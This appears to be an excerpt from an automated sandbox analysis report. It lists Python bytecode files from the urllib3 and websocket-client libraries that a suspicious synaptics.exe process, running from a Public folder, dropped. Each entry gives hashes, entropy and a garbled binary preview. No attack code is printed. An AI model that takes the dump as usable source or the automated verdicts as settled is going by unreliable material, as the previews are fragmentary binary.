                                                                                                                                                                                      Preview:o.......=..f.........................@...s....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...e.j.r%d.d.l.m.Z...d.Z.G.d.d...d.e...Z...d!d"d.d...Z.d#d.d...Z...d$d%d.d ..Z.d.S.)&zHThe match_hostname() function from Python 3.5, essential when using SSL......)...annotationsN)...IPv4Address..IPv6Address.....)..._TYPE_PEER_CERT_RET_DICTz.3.5.0.1c....................@...s....e.Z.d.Z.d.S.)...CertificateErrorN)...__name__..__module__..__qualname__..r....r.....QC:\Users\Public\QExvbmVOb25l\lib\site-packages\urllib3\util\ssl_match_hostname.pyr........s........r......dn..typing.Any..hostname..str..max_wildcards..int..return..typing.Match[str] | None | boolc....................C...s....g.}.|.s.d.S.|...d...}.|.d...}.|.d.d.....}.|...d...}.|.|.k.r&t.d.t.|.........|.s2t.|.....|.....k...S.|.d.k.r<|...d.....n.|...d...sF|...d...rO|...t...|.......n.|...t...|.....d.d.......|.D.].}.|...t...|.......q]t...d.d...|.....d...t.j...}.|...|...S.).zhMatching according to RFC 6125, section 6.4.3.. http://to
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9418
                                                                                                                                                                                      Entropy (8bit):5.267188456300155
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:P330cuKX0gSvpkv9nfgC+JI/XdABK1sdIDv5YaBbcMhu:P330lK/Svp4hXdcYsyxBYWu
                                                                                                                                                                                      MD5:245AD02E3CC1AC0972BF2A46C0C44171
                                                                                                                                                                                      SHA1:1B411627F23A2EBF45D666F4B4F0B49EC01AA5BB
                                                                                                                                                                                      SHA-256:DFF9C0FE4DCA8218C6354A0DD0869DD7EE4EA7BEBE8893508FFB00153E1ABF92
                                                                                                                                                                                      SHA-512:DDCE920C2BC55A009128DC1EBEC1DAE396D14A8A9701F74B7ACFDBCCD759E131DD69714E3ED84C616A4F018C571A2A7382F7D27A90972C0FBBFDC18765717ED3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f.".......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e.j.r-d.d.l.m.Z...d.d.l.m.Z.m.Z...e.j.e.e.f...Z.e...d...Z.d.Z.G.d.d...d...Z.d.S.)......)...annotationsN.....)...ProxySchemeUnsupported)...Self.....)..._TYPE_PEER_CERT_RET.._TYPE_PEER_CERT_RET_DICT.._ReturnValuei.@..c....................@...s....e.Z.d.Z.d.Z.e.dsd.d.....Z.....dtdud.d...Z.dvd.d...Z.dwd.d...Z.dxd.d...Z.dydzd!d"..Z.d{d|d&d'..Z....#d}d~d,d-..Z.d.d.d0d1..Z.d.d.d2d3..Z...d.d.d.d.d4..d.d<d=..Z.d.d>d?..Z.d.d@dA..Z.e.j..Bd.d.dFdG....Z.e.j.d.dJdG....Z.d.d.dMdG..Z.d.dNdO..Z.d.dQdR..Z.d.dSdT..Z.d.dVdW..Z.d.dXdY..Z.d.d\d]..Z.d.d^d_..Z.d.d`da..Z.d.d.dcdd..Z.e.j.d.dgdh....Z.e.j.d.dkdh....Z.e.j.d.dndh....Z.....d.d.drdh..Z.d.S.)...SSLTransportaL.... The SSLTransport wraps an existing socket and establishes an SSL connection... Contrary to Python's implementation of SSLSocket, it allows you to chain. multiple TLS connections together. It's particularly useful if you need to. i
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9598
                                                                                                                                                                                      Entropy (8bit):5.132660416158546
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:H08vOMrflhdz+7V0MV8K7byybXiCDzQyFF/LCfAChn8l/qxzWOBGawWy8I81GZ5e:Hdrn+l/ucy80CBXPqGrpjMKfQHcsyJO
                                                                                                                                                                                      MD5:0AE4CFBA3DB9B3E692E3248BA15A5323
                                                                                                                                                                                      SHA1:B37EC4DAA319581E8F5D30B9B346438775585031
                                                                                                                                                                                      SHA-256:251B2E1A71158B5F566C195FC2E1EC8D938D2790A363979D3F4456E406E61889
                                                                                                                                                                                      SHA-512:4A925AA9FF6387B57EA65E0E7E672CFBE0FDBC9B734766DCF43D191E13418AE77753B772D72A6208089C36FF4240C5A803F2CEC9CC74F70DCCA28F6CC6AEA7CF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..fj(.......................@...s....U.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.r*d.d.l.m.Z...G.d.d...d.e...Z.e.j.Z.d.e.d.<.e.j.e.j.e.e.f.....Z.G.d.d...d...Z.d.S.)......)...annotationsN)...Enum)...getdefaulttimeout.....)...TimeoutStateError)...Finalc....................@...s....e.Z.d.Z.d.Z.d.S.)..._TYPE_DEFAULT.....N)...__name__..__module__..__qualname__..token..r....r.....FC:\Users\Public\QExvbmVOb25l\lib\site-packages\urllib3\util\timeout.pyr........s........r....z.Final[_TYPE_DEFAULT].._DEFAULT_TIMEOUTc....................@...s....e.Z.d.Z.U.d.Z.e.Z.d.e.d.<.d.e.e.f.d$d.d...Z.d%d.d...Z.e.Z.e.d&d.d.....Z.e.d'd.d.....Z.e.d(d.d.....Z.d)d.d...Z.d*d.d...Z.d*d.d...Z.e.d+d d!....Z.e.d,d"d#....Z.d.S.)-..Timeouta....Timeout configuration... Timeouts can be defined as a default for a pool:.. .. code-block:: python.. import urllib3.. timeout = urllib3.util.Timeout(connect=2.0, read=7.0).. http = urllib3.PoolManager(timeout=timeout)..
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11236
                                                                                                                                                                                      Entropy (8bit):5.783864614134648
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:JVOJJgt54ZqlH/qh/QFYP0YU5HqDtR4qzFYqW1D5hOBdmpInwqH5qVcPoO8RqUvi:JVeJgt54ZqVqhoJxHqDtR4qxYqW1D5k3
                                                                                                                                                                                      MD5:6823E15C6C2104B4317C44BA912CA4AE
                                                                                                                                                                                      SHA1:2CDC4612EEB65FF54C938A0516041128C48E0F07
                                                                                                                                                                                      SHA-256:6B2478317624B203689A6BA99F91BB4FB187BB5ECF6FA65150EE0FF8E8E47C2E
                                                                                                                                                                                      SHA-512:D950694ADFF1231D3EF318B03480AA1A79619103FD7C5E642771B9084B922558549C4EBCD81E0EF6348BEF6DB803048D7CEB033B3ED538E9B8F177B694E69009
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..fm;.......................@...s~...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.e...d...Z.e...d...Z.e...d.e.j.e.j.B...Z.d.Z.d.Z.d.j.e.e.d...Z.e.e.d...Z.g.d...Z.d.Z.d.d...d.d...e.D.......d...Z.d.e...d...Z.d.e...d...e...d...Z.d.Z.e...d...Z.e...d.e...d.....Z.e...d.e...d.....Z.e...d.e...d.....Z.e...d.e.d.d.......d.....Z.e...d e...d!....Z d"e.e.e.f...Z!e...e!e.j.e.j.B...Z"e#d#..Z$e#d$..Z%e$e%B.d%h.B.Z&e&d&d'h.B.Z'e'd(h.B...Z(Z)G.d)d*..d*e..*d*d+e.j+e,..f.d,e.j+e,..f.d-e.j+e,..f.d.e.j+e-..f.d/e.j+e,..f.d0e.j+e,..f.d1e.j+e,..f.g.....Z.e.j/dMd7d8....Z0e.j/dNd:d8....Z0dOd<d8..Z0dPd=d>..Z1e.j/dQd?d@....Z2e.j/dRdAd@....Z2dSdBd@..Z2dTdEdF..Z3dUdHdI..Z4dVdKdL..Z5d.S.)W.....)...annotationsN.....)...LocationParseError.....)...to_str)...http..httpsNz.%[a-fA-F0-9]{2}z.^(?:[a-zA-Z][a-zA-Z0-9+-]*:|/)zS^(?:([a-zA-Z][a-zA-Z0-9+.-]*):)?(?://([^\\/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?$z.(?:[0-9]{1,3}\.){3}[0-9]{1,3}z.[0-9A-Fa-f]{1,4}z.(?:{hex}:{hex}|{ipv4}))...hexZ.ipv4).r....Z.ls32).
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1207
                                                                                                                                                                                      Entropy (8bit):5.053169822129588
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:Su2LkVMQdXRjkhlcRMHyz4tMXSwgpsqnud9Qzm+6IErGXTSu:S0MQdBYhlchWp1KQ9+GXmu
                                                                                                                                                                                      MD5:9365154AD6F626F4381CFC598D9EFBDB
                                                                                                                                                                                      SHA1:D5AA8F2CF7B527905900E926F3B2C1F8B3F8EA9B
                                                                                                                                                                                      SHA-256:17C26430C03F09005F9B412FCA37714D9CFA8B705B6E1333C5FD5A6AFBD843DA
                                                                                                                                                                                      SHA-512:192454D83C886EA33E2C43D81D49C7B5F6FF537C4E395C6747748897D0D0AB98FEF4FA8343058FABB0137047814FF27FAAB96F7EBA3372600B0C55EB5922B3FF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..fz........................@...sN...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.....d.d.d.d...Z...d.d.d.d...Z...d.d.d.d...Z.d.S.)......)...annotationsN)...TracebackType..x..str | bytes..encoding..str | None..errors..return..bytesc....................C....R...t.|.t...r.|.S.t.|.t...s.t.d.t.|...j.........|.s.|.r%|.j.|.p.d.|.p"d.d...S.|.....S...Nz.not expecting type z.utf-8..strict).r....)...isinstancer......str..TypeError..type..__name__..encode..r....r....r......r.....CC:\Users\Public\QExvbmVOb25l\lib\site-packages\urllib3\util\util.py..to_bytes.......................r....r....c....................C...r....r....).r....r....r....r....r....r......decoder....r....r....r......to_str....r....r......tp..type[BaseException] | None..value..BaseException..tb..TracebackType | None..typing.NoReturnc....................C...s$...z.|.j.|.u.r.|...|.....|...d.}.d.}.w...N)...__traceback__..with_traceback).r....r....r....r....r....r......reraise....s................r%...).NN).r....r....r....r....r....r....r..
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2386
                                                                                                                                                                                      Entropy (8bit):5.152838774685659
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:3y6A4HN1SSpUlQYvX7ws85K4CE8uG9G0N3Ae8wWv9O3ArDiPh:3y6A4HT1pMvX7h0mh9GcAFwWlIArDiPh
                                                                                                                                                                                      MD5:CCC0DA8D59E9CD01540D64AA55F301D2
                                                                                                                                                                                      SHA1:A511DB83382D48750970B07BFDB1362CD7ED9EF1
                                                                                                                                                                                      SHA-256:4E103663D9FF581E17A89FEC67A9F8A4661C05E04BA131329E0B19EE48F1E8F1
                                                                                                                                                                                      SHA-512:47CB7CA3BA3D11E5632FDA972BBCBA39794E7B278569A6FB66207BFBFB5A4064ED0B2ACD74D4DFFC626CA1BD1949CCCFBA46D6045566A571B1B4BD5E1150FD82
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..fG........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.g.Z.......d.d.d.d...Z.......d.d.d.d...Z.d.d.d...Z.......d.d.d.d...a.d.d.d.d...Z.d.d.d.d...Z.d.S.)......)...annotationsN)...partial..wait_for_read..wait_for_writeF..sock..socket.socket..read..bool..write..timeout..float | None..returnc....................C...sb...|.s.|.s.t.d.....g.}.g.}.|.r.|...|.....|.r.|...|.....t.t.j.|.|.|...}.|.|...\.}.}.}.t.|.p/|.p/|...S.).N.2must specify at least one of read=True, write=True)...RuntimeError..appendr......selectr....).r....r....r....r....Z.rcheckZ.wcheck..fnZ.rreadyZ.wreadyZ.xready..r.....CC:\Users\Public\QExvbmVOb25l\lib\site-packages\urllib3\util\wait.py..select_wait_for_socket!...s..........................r....c........................s^...|.s.|.s.t.d.....d.}.|.r.|.t.j.O.}.|.r.|.t.j.O.}.t...........|.|.....d...f.d.d...}.t.|.|.....S.).Nr....r......tr....r......list[tuple[int, int]]c........................s....|.d.u.r.|.d.9.}.....|...S.).Ni....)...poll).r..
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):982
                                                                                                                                                                                      Entropy (8bit):5.482247975063762
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:Z5G9Zl4IpheU0E+4HQk1Gps2OJjGJq4E+P:ZAl4+h0CH31KiJjG2g
                                                                                                                                                                                      MD5:2992602B10AECD1F89DD35F6CE079345
                                                                                                                                                                                      SHA1:545AAE4996C38E967493C1ACBD303B282C9D055E
                                                                                                                                                                                      SHA-256:3B31F9F9797E296972C7F0D92288A54654D8F65E2FB47DCD432A33DD3C94A1BA
                                                                                                                                                                                      SHA-512:F3BC8441A9E574C91D0421B24D11D0B18E2E92AF5114F887A89FBBA6063BF0A97AB7A189B0233488E9698F2296CBA4F3249749ED3E86CB12996D2A6B421F09A7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.........fA........................@...sD...d.Z.d.d.l.T.d.d.l.m.Z.m.Z...d.d.l.T.d.d.l.T.d.d.l.T.d.d.l.T.d.Z.d.S.).ab....__init__.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License.......)...*)...WebSocketApp..setReconnectz.1.8.0N)...__doc__Z._abnfZ._appr....r....Z._core.._exceptionsZ._logging.._socket..__version__..r....r.....DC:\Users\Public\QExvbmVOb25l\lib\site-packages\websocket\__init__.py..<module>....s....................
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11151
                                                                                                                                                                                      Entropy (8bit):5.411950423612766
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:pfJmK7EmCkzdMfdx4cIl+UqLcHo36L5FskQJeCiROUppvaZdre82l4rn0WFV:DmTSulap8UCAo3Kn4GHppCe82+rn0o
                                                                                                                                                                                      MD5:E47CF4AA8EEC779F22375E30C8768961
                                                                                                                                                                                      SHA1:1D1CAD9FF8D547515B6CD2BBB5C7F1B7BF189BE9
                                                                                                                                                                                      SHA-256:63798463C9D7A79A947FE5E4B5E7B7E1AF7A9A906A644A5457B0FF54C55D6DFA
                                                                                                                                                                                      SHA-512:CD6E6A22943FD75FDCD9548EC686AE4566E02BAAE75A4B34D9AD61AC715476F523C3BEE42D7362267FCFB98624B350186AC94D2CC0A364220D0ACFC35419DC2F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.........f18.......................@...sJ...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....z.d.d.l.m.Z...d.e.j.d.e.j.d.e.f.d.d...Z.W.n...e.y]......e.j.Z.d.e.j.d.e.j.d.e.f.d.d...Z.Y.n.w.g.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z d.Z!d.Z"d.Z#d.Z$d.Z%e.e.e.e.e.e.e.e e!e"e#e$f.Z&G.d.d...d...Z'G.d d!..d!..Z(G.d"d#..d#..Z)d.S.)$.....N)...Lock)...Callable..Optional..Union.....)...WebSocketPayloadException..WebSocketProtocolException)...validate_utf8)...XorMaskerSimple..mask_value..data_value..returnc....................C...s....t.|.....|...}.|.S...N).r......process).r....r....Z.mask_result..r.....AC:\Users\Public\QExvbmVOb25l\lib\site-packages\websocket\_abnf.py.._mask%...s........r....c....................C...sH...t.|...}.t...|.t...}.t...|.|.d.....|.d.|.d.........t...}.|.|.A...|.t...S.).N.....)...len..int..from_bytes..native_byteorder..to_bytes).r....r....Z.datalenZ.int_data_valueZ.int_mask_valuer....r....r....r....-...s................).
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):19439
                                                                                                                                                                                      Entropy (8bit):5.402801094079532
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:hHJMnoF3eIfFDxNUbVr5mEtr0zSo0/3888tiYn:hHJMnoF3eIddNcrggqSo0/98ln
                                                                                                                                                                                      MD5:9787965DF1835A7A87A17C25E287A9E9
                                                                                                                                                                                      SHA1:F8B307DEA8E26EBC3020972BB0EA48A7FF32D414
                                                                                                                                                                                      SHA-256:E6E20C680CEF12480B970E68D7191748E4E93D8532CA18101B2004F1DED16B25
                                                                                                                                                                                      SHA-512:CCAFB454FB9AB7436074FE4A88581C67421109B663534B8D6962600ADE6DDD4066FFD647DC00B21DF65529C2199F12A6D633DC072CA159400A080ADC15FA443F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.........fp^.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.....d.g.Z.d.a.d.e.d.d.f.d.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d...Z G.d.d...d...Z!d.S.)......N)...Any..Callable..Optional..Union.....)..._logging)...ABNF)...WebSocket..getdefaulttimeout).."WebSocketConnectionClosedException..WebSocketException..WebSocketTimeoutException)...SSLEOFError)...parse_url..WebSocketApp..reconnectInterval..returnc....................C...s....|.a.d.S...N)...RECONNECT).r......r.....@C:\Users\Public\QExvbmVOb25l\lib\site-packages\websocket\_app.py..setReconnect+...s......r....c....................@...sf...e.Z.d.Z.d.Z.d.e.d.e.e.e.d.f...d.d.f.d.d...Z.d.e.e.e.d.f...d.e.d.d.f.d.d...Z.d.e.d.e.d.d.f.d.d...Z.d.S.)...DispatcherBasez.. DispatcherBase. ..app..ping_timeoutNr....c....................C...s....|.|._.|.|._.d.S.r....).r....r....)...selfr....r...
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1834
                                                                                                                                                                                      Entropy (8bit):5.107429666805262
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:IYq+PHq2cYReITZg0ZVzD0oOBzttwutP5iIv0UdzcbVHckuxj7kV5ZFgrI:5lPlcBI7gPBzreIv0UdzMcLgV5KI
                                                                                                                                                                                      MD5:38FA929CFCFFAAD6955999E2FE5771E3
                                                                                                                                                                                      SHA1:9A93E24C6E5C2B2FA1ABA8FDF18A2A4C07BCAD05
                                                                                                                                                                                      SHA-256:B87E648572FBA12A2D642823468818019D809052A8DCA59697ECA10B4F13E19E
                                                                                                                                                                                      SHA-512:9E7655351F7D140EAB7818A1A898FC1D8FA135E90418B123C7FB59B98BC0B325036CEF9BCDFCBE3CF7EAD10573BB433772193765358F8748BA4761B5CED257F8
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.........f_........................@...s(...d.d.l.Z.d.d.l.m.Z.....G.d.d...d...Z.d.S.)......N)...Optionalc....................@...sP...e.Z.d.Z.d.d.d...Z.d.e.e...d.d.f.d.d...Z.d.e.d.d.f.d.d...Z.d.e.d.e.f.d.d...Z.d.S.)...SimpleCookieJar..returnNc....................C...s....i.|._.d.S.).N)...jar)...self..r.....FC:\Users\Public\QExvbmVOb25l\lib\site-packages\websocket\_cookiejar.py..__init__....s......z.SimpleCookieJar.__init__..set_cookiec....................C...s....|.r=t.j...|...}.|.....D.]2}.|...d.....}.r<|...d...s.d.|.....}.|.j...|...r+|.j...|...n.t.j.....}.|...|.....|.|.j.|.....<.q.d.S.d.S...N..domain...)...http..cookies..SimpleCookie..values..get..startswithr......update..lower).r....r......simple_cookie..vr......cookier....r....r......add....s..................................z.SimpleCookieJar.addc....................C...sV...|.r't.j...|...}.|.....D.].}.|...d.....}.r&|...d...s.d.|.....}.|.|.j.|.....<.q.d.S.d.S.r....).r....r....r....r....r....r....r....r....).r....r....r....r....r.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):18751
                                                                                                                                                                                      Entropy (8bit):5.2601579536628655
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:/5oj/9NgJvx938wlJYz2citggg7zXEjsVdTPe:/a9N+3rlO2ciU7DEYnTPe
                                                                                                                                                                                      MD5:21A5CE6458B8B393E4B7BD05858DB681
                                                                                                                                                                                      SHA1:66E1AACCE9603888307F851B50043D08D2DF40AD
                                                                                                                                                                                      SHA-256:A972D2B9E252D9FACEFB014E686DBF354BE298CA4C870A9DA00F881D3124EF27
                                                                                                                                                                                      SHA-512:5A162829A9A91AD683EE776AB98E2C834461DD7AE32BF746CB5C54095736EFFE1F6C770217B6595629B085FEA003B1E39779B53581BB30FC2BACBA9C8E155E61
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.........fXR.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l m!Z!..d.d.l"m#Z#....d.d.g.Z$G.d.d...d...Z%d.e%f.d.e&f.d.d...Z'd.S.)......N)...Optional..Union.....)...ABNF..STATUS_NORMAL..continuous_frame..frame_buffer)...WebSocketProtocolException."WebSocketConnectionClosedException)...SUPPORTED_REDIRECT_STATUSES..handshake)...connect..proxy_info)...debug..error..trace..isEnabledForError..isEnabledForTrace)...getdefaulttimeout..recv..send..sock_opt)...ssl)...NoLock..WebSocket..create_connectionc....................@...s ...e.Z.d.Z.d.Z.............dPd.e.d.e.d.e.f.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.e.e.e.d.f...f.d.d...Z.d.e.e.e.d.f...f.d.d...Z.e.e.e...Z.d.d...Z.e.e...Z.d.d...Z.e.e...Z.d.d...Z.d d!..Z.e.e...Z.d"d#..Z.e.j.f.d$e.e.e.f...d%e.d.e.f.d&d'..Z.d(e.d.e.f.d)d*..Z.d+e.e.e f...d.e.f.d,d-..Z!d.e.f.d.d/..Z"d$e.d.e
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2940
                                                                                                                                                                                      Entropy (8bit):5.121989315034816
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:rJC9Vw3WRenl4+h0CH31KO8ZpKJjznx8uDCDcDHMjk9LQVR3qh89CK:c9Vw3Cenl4s3HFKDZpsztDAcDsMQH79B
                                                                                                                                                                                      MD5:21EA6D626CB87B6B23F719C05BE63BD7
                                                                                                                                                                                      SHA1:6A5563FEFBF089F3493207051ED92ADF8FFDF95B
                                                                                                                                                                                      SHA-256:982F189065EA6D8AAC61CF721F8CED8EE717F0803A1B69BA952FAA8A3144A9B9
                                                                                                                                                                                      SHA-512:BFE15CCFE7DE580BE7F0DE52E48035DD4EF31A3C6DE1A793EF03C161D1BCE47BB8858FD2C12FBFB0568FDD61C635E052EAAD719597BFE8E026CFEC5E10420566
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.........f.........................@...s....d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).ae...._exceptions.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..c....................@........e.Z.d.Z.d.Z.d.S.)...WebSocketExceptionz$. WebSocket exception class.. N....__name__..__module__..__qualname__..__doc__..r....r.....GC:\Users\Public\QExvbmVOb25l\l
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5693
                                                                                                                                                                                      Entropy (8bit):5.69047276580604
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:bZr4s3HFKqfGn4zflfe8mtj6my9mZH5yEG/Zd2ROHvNI2Mr6uURW8R6:1r33HxO4zfc8IHChd+qhRPR6
                                                                                                                                                                                      MD5:9E34B36B0ED9C5FC4800426B9434E3A9
                                                                                                                                                                                      SHA1:9521174353C433EB567FDAD1E51E937542157F1A
                                                                                                                                                                                      SHA-256:F89812DDF3CA6E2BAB1807605188EDCEFD66886361067ECF5136BE3548DE0524
                                                                                                                                                                                      SHA-512:D89B430C7E0E874D18820C1AF9BD2D821A186EB88D4AD453239636D18EE4909A88500C14FB19AF25BF6F1AB4583E269C592D6C76965BA50CBB0238FA6A41D048
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.........f.........................@...sR...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...g.d...Z.d.Z.e.j.e.j.e.j.e.j.e.j.f.Z.e.e.j.f...Z.e...Z.G.d.d...d...Z d.e!d.e!d.e"d.e!d.e f.d.d...Z#d.e!d.e!f.d.d...Z$d.e!d.e!d.e!d.e"d.e%d.e&f.d.d...Z'e.f.d.e&d.e&f.d.d...Z(d.d d!..Z)d"e!d.e&f.d#d$..Z*d.e!f.d%d&..Z+d.S.)'ad...._handshake.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the Licens
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8100
                                                                                                                                                                                      Entropy (8bit):5.658839581302532
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:G33HeL4DWl5HfG443QYGo3R0wTk9SJXg2QhkmYeG:G3E4DWl5/23QYGoh0icdkveG
                                                                                                                                                                                      MD5:B7F1CBD1E15EA065CC3803D71F31970D
                                                                                                                                                                                      SHA1:1C01AA68D244FE3005763D6BC051979BA75DA10E
                                                                                                                                                                                      SHA-256:360706C6237789E2DF88FE1D364FDD51875BA2E54E75999285345534733724F3
                                                                                                                                                                                      SHA-512:D23CE8BD73E752051BAE2CF065EBE4DBAE7043C38876173525425D59DB57B04F88905CFD7DF1F5F450F000B856FBE83AB6C420129855E460156E4161FD679C58
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
